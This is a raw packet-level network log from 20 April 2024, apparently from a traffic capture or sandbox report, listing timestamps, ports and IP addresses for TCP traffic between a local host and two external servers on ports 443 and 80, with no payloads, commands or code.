Apr 20, 2024 11:36:06.179153919 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.179158926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.179172993 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.180655956 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.180699110 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.180749893 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.180757046 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.180768967 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.181704998 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.181735039 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.181759119 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.181766033 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.181777000 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.181809902 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.181930065 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.182701111 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.182732105 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.182756901 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.182761908 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.182776928 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.182795048 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.182934999 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.184555054 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.184585094 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.184614897 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.184618950 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.184645891 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.184659958 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.185790062 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.185831070 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.185858965 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.185863972 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.185880899 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.187513113 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.187539101 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.187566996 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.187572002 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.187597036 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.187608957 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.188424110 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.188452005 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.188488007 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.188493967 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.188503027 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.190164089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.190196991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.190220118 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.190223932 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.190248013 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.190264940 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.191132069 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.191163063 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.191185951 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.191191912 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.191214085 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.191431046 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.205982924 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.206021070 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.206075907 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.206082106 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.206091881 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.207205057 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.207241058 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.207262993 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.207268000 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.207289934 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.208372116 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.208400011 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.208431005 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.208436012 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.208458900 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.209340096 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.209377050 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.209400892 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.209405899 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.209419966 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.211119890 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.211148977 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.211175919 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.211180925 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.211201906 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.212096930 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.212137938 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.212157965 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.212162971 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.212173939 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.212198973 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.213496923 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.213534117 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.213566065 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.213571072 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.213581085 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.214613914 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.214647055 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.214673042 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.214679003 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.214694977 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.216243982 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.216273069 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.216326952 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.216331959 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.216353893 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.217325926 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.217359066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.217384100 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.217390060 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.217412949 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.218722105 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.218750954 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.218781948 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.218787909 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.218799114 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.219949961 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.219984055 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.220005035 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.220009089 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.220025063 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.221465111 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.221493959 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.221525908 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.221530914 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.221550941 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.222636938 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.222670078 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.222693920 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.222698927 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.222718954 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.223683119 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.223711967 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.223740101 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.223746061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.223762035 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.225188017 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.225222111 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.225244045 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.225249052 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.225276947 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.226754904 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.226783991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.226835012 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.226840019 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.226850033 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.227797031 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.227829933 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.227849960 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.227854967 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.227865934 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.228765965 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.228794098 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.228818893 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.228823900 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.228843927 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.230499029 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.230531931 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.230556011 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.230560064 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.230582952 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.231900930 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.231930017 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.231959105 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.231964111 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.231982946 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.232934952 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.232975006 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.232996941 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.233001947 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.233067036 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.233088970 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.233105898 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.233105898 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.233105898 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.233105898 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.233117104 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.346224070 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.346232891 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.346263885 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.346280098 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.346301079 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.346415043 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.346466064 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.346541882 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.346597910 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.346677065 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.346698999 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.353173018 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.353177071 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.353185892 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.353214979 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.353230000 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.353244066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.353260040 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.353323936 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.353348970 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.353450060 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.353497982 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.353569984 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.353595018 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.357729912 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.357745886 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.357773066 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.357836008 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.357855082 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.357928991 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.357964039 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.357963085 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.357971907 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358027935 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358052969 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358062029 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358097076 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358151913 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358171940 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358202934 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358269930 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358284950 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358315945 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358352900 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358391047 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358416080 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358437061 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358453989 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358457088 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358489037 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358489990 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358514071 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358525038 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358532906 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358541965 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358550072 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358560085 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358565092 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358598948 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358604908 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358633041 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358683109 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358707905 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358762026 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358799934 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358805895 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.358836889 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.358879089 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.362948895 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.362952948 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.362966061 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.362986088 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363012075 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363030910 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363044024 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363059044 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363080025 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363085032 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363089085 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363115072 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363118887 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363126993 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363176107 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363178968 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363188028 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363205910 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363209009 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363219976 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363275051 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363308907 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363312006 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363363028 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363367081 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363399029 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363403082 CEST	443	49164	172.67.215.45	192.168.2.22
Apr 20, 2024 11:36:06.363471031 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363512039 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363574028 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363621950 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363707066 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363759041 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363830090 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363878012 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.363935947 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.369364023 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.378974915 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:06.397272110 CEST	49164	443	192.168.2.22	172.67.215.45
Apr 20, 2024 11:36:11.622406006 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:11.775502920 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.775602102 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:11.811914921 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:11.967931032 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.967993021 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.968033075 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.968065977 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:11.968070030 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.968132973 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:11.968139887 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.968179941 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.968219042 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.968234062 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:11.968259096 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.968298912 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.968307972 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:11.968342066 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:11.968390942 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.121550083 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121611118 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121671915 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121674061 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.121710062 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121751070 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121763945 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.121797085 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121835947 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121850967 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.121875048 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121916056 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121926069 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.121956110 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.121994019 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122010946 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.122034073 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122072935 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.122077942 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122121096 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122159004 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122164011 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.122199059 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122241020 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122252941 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.122281075 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122332096 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.122338057 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122378111 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.122446060 CEST	49165	80	192.168.2.22	23.95.60.75
Apr 20, 2024 11:36:12.275573969 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275638103 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275677919 CEST	80	49165	23.95.60.75	192.168.2.22
Apr 20, 2024 11:36:12.275705099 CEST	49165	80	192.168.2.22	23.95.60.75
